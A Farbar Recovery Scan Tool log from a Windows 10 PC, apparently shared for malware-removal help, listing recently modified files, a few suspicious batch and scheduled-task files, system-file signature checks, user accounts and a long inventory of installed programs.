2017-12-16 06:34 - 2017-05-07 21:52 - 005964688 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-12-16 06:34 - 2017-05-07 21:52 - 002589168 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-12-16 06:34 - 2017-05-07 21:52 - 001767408 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-12-16 06:34 - 2017-05-07 21:52 - 000608056 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-12-16 06:34 - 2017-05-07 21:52 - 000450544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-12-16 06:34 - 2017-05-07 21:52 - 000123704 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-12-16 06:34 - 2017-05-07 21:52 - 000082928 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-12-15 20:51 - 2017-11-13 12:23 - 000003484 _____ C:\WINDOWS\System32\Tasks\gxx speed launcher
2017-12-15 02:17 - 2017-05-07 21:52 - 007917671 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-12-14 09:36 - 2017-11-13 12:23 - 000004588 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-12-14 09:36 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-12-14 09:36 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-12-14 09:20 - 2017-11-13 12:07 - 000000000 ____D C:\Users\ouroboros\AppData\Local\Packages
2017-12-13 20:35 - 2015-12-26 03:52 - 000000000 ____D C:\Users\ouroboros\AppData\Local\ElevatedDiagnostics
2017-12-13 10:14 - 2017-11-13 12:47 - 000000000 ___RD C:\Users\ouroboros\3D Objects
2017-12-13 10:14 - 2015-11-03 02:44 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-12-13 10:12 - 2017-11-13 12:01 - 005097072 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\TextInput
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\Provisioning
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\Program Files\Windows Defender
2017-12-13 10:09 - 2017-09-29 21:46 - 000000000 ____D C:\PerfLogs
2017-12-13 10:09 - 2017-09-29 16:45 - 000000000 ____D C:\WINDOWS\system32\Dism
2017-12-13 03:26 - 2015-12-22 23:12 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-12-13 03:23 - 2017-10-13 00:14 - 133326408 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT-KB890830.exe
2017-12-13 03:23 - 2015-12-22 23:12 - 133326408 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-12-13 03:20 - 2017-09-29 21:41 - 001856000 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2017-12-13 03:20 - 2017-09-29 21:41 - 000139672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
2017-12-13 03:20 - 2017-09-29 21:41 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
2017-12-13 03:19 - 2017-09-29 21:42 - 001587200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-12-12 04:49 - 2015-12-21 08:04 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
 
==================== Files in the root of some directories =======
 
2018-01-03 10:41 - 2017-09-29 21:42 - 000001110 _____ () C:\Program Files (x86)\Common Files\EnAWI
2017-09-29 21:42 - 2017-09-29 21:42 - 000001110 _____ () C:\Program Files (x86)\Common Files\EnAWI.bat
2018-01-03 10:41 - 2017-09-29 21:42 - 000000054 _____ () C:\Program Files (x86)\Common Files\rYms
2017-09-29 21:42 - 2017-09-29 21:42 - 000000054 _____ () C:\Program Files (x86)\Common Files\rYms.bat
2016-02-14 20:24 - 2017-06-20 09:42 - 000000132 _____ () C:\Users\ouroboros\AppData\Roaming\Adobe PNG Format CS6 Prefs
2017-04-27 13:52 - 2017-04-27 14:35 - 000000055 _____ () C:\Users\ouroboros\AppData\Roaming\My Profile.xml
2018-01-03 19:57 - 2018-01-05 09:59 - 000000164 _____ () C:\Users\ouroboros\AppData\Roaming\sp_data.sys
2017-12-12 04:49 - 2017-12-17 07:07 - 000000068 _____ () C:\Users\ouroboros\AppData\Local\HvpjdXLztn
2017-12-18 08:04 - 2017-12-18 08:50 - 000000068 _____ () C:\Users\ouroboros\AppData\Local\lptx123456
 
Files to move or delete:
====================
C:\Windows\Tasks\{447123AD-7416-1893-A863-7ED1A81B6B4D}.job
C:\Windows\Tasks\{6FEFFD84-0D29-0B78-4530-415A173AA131}.job
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-12-25 00:09
 
==================== End of FRST.txt ============================
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02.01.2018
Ran by ouroboros (05-01-2018 10:22:46)
Running from C:\Users\ouroboros\Desktop
Windows 10 Home Single Language Version 1709 16299.125 (X64) (2017-11-13 04:27:25)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1787623747-1286628437-3931833605-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1787623747-1286628437-3931833605-503 - Limited - Disabled)
Guest (S-1-5-21-1787623747-1286628437-3931833605-501 - Limited - Disabled)
ouroboros (S-1-5-21-1787623747-1286628437-3931833605-1001 - Administrator - Enabled) => C:\Users\ouroboros
Visitor (S-1-5-21-1787623747-1286628437-3931833605-1002 - Limited - Enabled) => C:\Users\Visitor
WDAGUtilityAccount (S-1-5-21-1787623747-1286628437-3931833605-504 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Creative Suite 6 Master Collection (HKLM-x32\...\{E8AD3069-9EB7-4BA8-8BFE-83F4E69355C0}) (Version: 6 - Adobe Systems Incorporated)
Adobe Dreamweaver CC 2014 (HKLM-x32\...\{766255CE-D156-11E3-8DBC-A136EB52ACCF}) (Version: 14.0.0 - Adobe Systems Incorporated)
Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.133 - Adobe Systems Incorporated)
Adobe Flash Player 28 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 28.0.0.126 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.1.1 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.23) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.23 - Adobe Systems Incorporated)
Apple Application Support (64-bit) (HKLM\...\{691F30EB-9009-475A-B8A9-E1BF39598FD5}) (Version: 4.1.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
ASUS GIFTBOX Desktop (HKLM-x32\...\{4701E5AB-AF91-4D40-8F18-358CC80E4E5B}) (Version: 1.1.5 - ASUS)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.4.3 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 4.0.9 - ASUS)
Asus Sonic Suite Plugins (HKLM-x32\...\{538766d1-8795-4e62-b3d3-cf65517bae51}) (Version: 2.0.7 - ASUSTeKcomputer.Inc)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 3.13.0004 - ASUS)
ASUS USB Charger Plus (HKLM-x32\...\{A859E3E5-C62F-4BFA-AF1D-2B95E03166AF}) (Version: 4.1.6 - ASUS)
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0040 - ASUS)
Autodesk Backburner 2014 (HKLM-x32\...\{3D347E6D-5A03-4342-B5BA-6A771885F379}) (Version: 14.0.0.0 - Autodesk, Inc.)
Autodesk Composite 2014 (HKLM\...\{5AAB972C-FF31-4B01-8445-50C42860EC02}) (Version: 9.0.0.0 - Autodesk) Hidden
Autodesk Composite 2014 (HKLM\...\Autodesk Composite 2014) (Version: 9.0.0.0 - Autodesk)
Autodesk DirectConnect 2014 64-bit (HKLM\...\{8FC7C2B2-0F64-4B35-AA3D-2B051D009243}) (Version: 8.0.56.1 - Autodesk) Hidden
Autodesk DirectConnect 2014 64-bit (HKLM\...\Autodesk DirectConnect 2014 64-bit) (Version: 8.0.56.1 - Autodesk)
Autodesk FBX Converter x64 2013.2 (HKLM-x32\...\Autodesk FBX Converter x64 2013.2) (Version:  - Autodesk)
Autodesk MatchMover 2014 (HKLM\...\{B151ECD3-2DBE-45E9-816E-F8AA6238F6A8}) (Version: 14.00.0000 - Autodesk)
Autodesk Maya 2014 (HKLM\...\{7FA8BC5D-7CE4-42F3-8EAE-32DF5BAB53A7}) (Version: 16.0.0.0 - Autodesk) Hidden
Autodesk Maya 2014 (HKLM\...\Autodesk Maya 2014) (Version: 16.0.0.0 - Autodesk)
Blackboard Collaborate Launcher (HKLM-x32\...\{AEED1D32-C837-405A-8009-6660E3883C9E}) (Version: 1.6.4.0 - Blackboard)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CheckDevicesConfigurator (HKLM\...\{C3B3D79A-7BFB-48AF-9C41-B0FE3D5D071C}) (Version: 2.0.701 - ASUSTeKcomputer.Inc) Hidden
Creatures of Darkness (HKLM-x32\...\{573F9269-A022-4C6F-97BD-CF1316A76369}) (Version: 3.3.1 - Screaming Bee)
Deep Space Voices (HKLM-x32\...\{67CEC218-B250-4B4C-B23F-A597EC8DB153}) (Version: 3.3.1 - Screaming Bee)
Dev-C++ (HKLM-x32\...\Dev-C++) (Version: 5.11 - Bloodshed Software)
Device Setup (HKLM-x32\...\{8D6B05E0-F457-408C-9D13-549334D8FAE1}) (Version: 2.0.2 - ASUSTek Computer Inc.)
Discord (HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\Discord) (Version: 0.0.299 - Discord Inc.)
Dropbox 25 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 1.0.8.0 - Dropbox, Inc.)
Evernote v. 5.8.6 (HKLM-x32\...\{FEDC7C10-EF67-11E4-9B07-00505695D7B0}) (Version: 5.8.6.7519 - Evernote Corp.)
Fantasy Voice Pack (HKLM-x32\...\{5F4C3E1F-87FC-41BD-B219-E4156BBD8AE5}) (Version: 1.3.2 - Screaming Bee)
Female Voice Pack (HKLM-x32\...\{D947A225-8C23-4E52-866E-CF3967476BFC}) (Version: 3.3.2 - Screaming Bee)
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Galactic Voices (HKLM-x32\...\{891D8FC9-726D-46F2-ADC0-E060A6EB1DC3}) (Version: 1.3.1 - Screaming Bee)
GameFirst IV (HKLM-x32\...\{2B5BE4E7-3E40-4BC4-A534-5342E3078F89}) (Version: 1.5.12 - ASUS) Hidden
GameFirst IV (HKLM-x32\...\GameFirst IV 1.5.12) (Version: 1.5.12 - ASUS)
Garena - League of Legends (HKLM-x32\...\LoLPH) (Version:  - Garena Online Pte Ltd.)
Garena (remove only) (HKLM-x32\...\gxx) (Version: 2.0.1712.1422 - Garena)
Google Chrome (HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\Google Chrome) (Version: 63.0.3239.132 - Google Inc.)
IL Download Manager (HKLM-x32\...\IL Download Manager) (Version:  - Image-Line)
Intel® Chipset Device Software (HKLM-x32\...\{c7f54569-0018-439c-809a-48046a4d4ebc}) (Version: 10.1.1.9 - Intel® Corporation) Hidden
Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10603.192 - Intel Corporation)
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1169 - Intel Corporation)
Intel® Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.100.1519.7 - Intel Corporation)
Intel® Wireless Bluetooth® (HKLM-x32\...\{9A287643-10C5-4463-B9D1-B2404CE18CCF}) (Version: 17.1.1529.1620 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{5853172b-5520-4089-9ef4-e26c594382b3}) (Version: 19.30.0 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
Intel® Watchdog Timer Driver (Intel® WDT) (HKLM-x32\...\{3FD0C489-0F02-481a-A3E1-9754CD396761}) (Version:  - Intel Corporation)
Intel® Watchdog Timer Driver (Intel® WDT) (HKLM-x32\...\3FD0C489-0F02-481a-A3E1-9754CD396761) (Version:  - Intel Corporation)
iTunes (HKLM\...\{FBEB98F8-64E4-4FA3-A15E-4A9F42FF962E}) (Version: 12.3.2.35 - Apple Inc.)
Java 8 Update 66 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218066F0}) (Version: 8.0.660.18 - Oracle Corporation)
KKBOX (HKLM-x32\...\KKBOX) (Version: 6.2.0.562 - KKBOX Taiwan Co., Ltd.)
LauncherSetup (HKLM\...\{FAF92126-24C9-4241-A922-FA6F2C896B4A}) (Version: 2.0.701 - ASUSTeKcomputer.Inc) Hidden
Malwarebytes version 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
mental ray renderer for Autodesk Maya 2014 (HKLM\...\{4F5AD3FF-38C6-43FB-BB6F-8EF830DEDF16}) (Version: 13.0.0.0 - mental ray)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProplusRetail - en-us) (Version: 16.0.8730.2127 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\OneDriveSetup.exe) (Version: 17.3.7076.1026 - Microsoft Corporation)
Microsoft Project Professional 2016 - en-us (HKLM\...\ProjectProRetail - en-us) (Version: 16.0.8730.2127 - Microsoft Corporation)
Microsoft Visio Professional 2016 - en-us (HKLM\...\VisioProRetail - en-us) (Version: 16.0.8730.2127 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
MorphVOX Pro (HKLM-x32\...\{4bfc0d50-0417-46a0-ab1e-475fb1a90916}) (Version: 4.4.17.22603 - Screaming Bee)
MorphVOX Pro (HKLM-x32\...\{5F075DA5-407B-4F4D-BF2A-922CCA85706A}) (Version: 4.4.17.22603 - Screaming Bee) Hidden
Mozilla Firefox 39.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 39.0 (x86 en-US)) (Version: 39.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 39.0 - Mozilla)
NahimicSettingsConfigurator (HKLM\...\{B1FF19B8-BC5F-49AC-B679-0A5DA36E8A43}) (Version: 2.0.701 - ASUSTeKcomputer.Inc) Hidden
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.63.14 - Black Tree Gaming)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.3.3 - Notepad++ Team)
NVIDIA 3D Vision Driver 388.71 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 388.71 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.11.0.73 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.11.0.73 - NVIDIA Corporation)
NVIDIA Graphics Driver 388.71 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 388.71 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.35.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.35.1 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.8730.2127 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.8730.2127 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0409-1000-0000000FF1CE}) (Version: 16.0.8730.2127 - Microsoft Corporation) Hidden
PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden
ProductDaemonSetup (HKLM\...\{0F5183BD-29DA-48CC-93DB-3924DA7EA212}) (Version: 2.0.701 - ASUSTeKcomputer.Inc) Hidden
qBittorrent 4.0.3 (HKLM-x32\...\qBittorrent) (Version: 4.0.3 - The qBittorrent project)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.2.703.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7831 - Realtek Semiconductor Corp.)
ROG Gaming Center (HKLM-x32\...\{CC182DBF-FC67-4F79-9930-6A2682E60BDD}) (Version: 1.0.1 - ASUS)
ROG MacroKey (HKLM-x32\...\{1101D2B9-7E8C-4361-88D5-AB0A2EB705EC}) (Version: 1.0.3 - ASUS)
Sci-Fi Voice Pack (HKLM-x32\...\{BC038C91-D3C6-4E43-8439-B65976FE7937}) (Version: 1.3.1 - Screaming Bee)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
SonicRadarSetup (HKLM\...\{490C61FF-D5A6-4335-A51E-0FC7DC65F591}) (Version: 1.0.0.0 - ASUSTeKcomputer.Inc) Hidden
SonicStudioSetup (HKLM\...\{34BCBD15-E877-4277-A4E1-A8C1E2DE0FE2}) (Version: 2.0.701 - ASUSTeKcomputer.Inc) Hidden
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Sun Broadband Hostless Modem (HKLM-x32\...\{AEFF9E60-3E93-41EE-9895-311F7D1C5FFD}) (Version: 1.0.0.2 - ZTE Corporation)
System Requirements Lab (HKLM-x32\...\{F89CDED6-B1F1-489F-BA44-698BF6A737C2}) (Version: 6.1.6.0 - Husdawg, LLC)
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
Thunderbolt™ Software (HKLM-x32\...\{E265C71F-14DA-462C-A06A-CBA776B695F1}) (Version: 15.2.32.250 - Intel Corporation)
Unity Web Player (HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\UnityWebPlayer) (Version: 5.3.5f1 - Unity Technologies ApS)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden
VLC media player 2.1.4 (HKLM\...\VLC media player) (Version: 2.1.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.12-2 - Wacom Technology Corp.)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.2.2.524 - ASUS Cloud Corporation)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.16 - WildTangent)
Windows Driver Package - ASUS (AsusSGDrv) Mouse  (08/06/2015 8.0.0.19) (HKLM\...\149F37A1996406108DA0EB71D7EBC48895119059) (Version: 08/06/2015 8.0.0.19 - ASUS)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 3.0.1 - ASUS)
WinRAR 5.31 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.1 - win.rar GmbH)
WPS Office (9.1.0.4758) (HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\WPS Office) (Version: 9.1.0.4758 - Kingsoft Corp.)
XSplit Gamecaster (HKLM-x32\...\{0E12BEC0-F2EE-43FA-AEA0-24B5E9F80167}) (Version: 2.5.1507.3011 - SplitmediaLabs)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
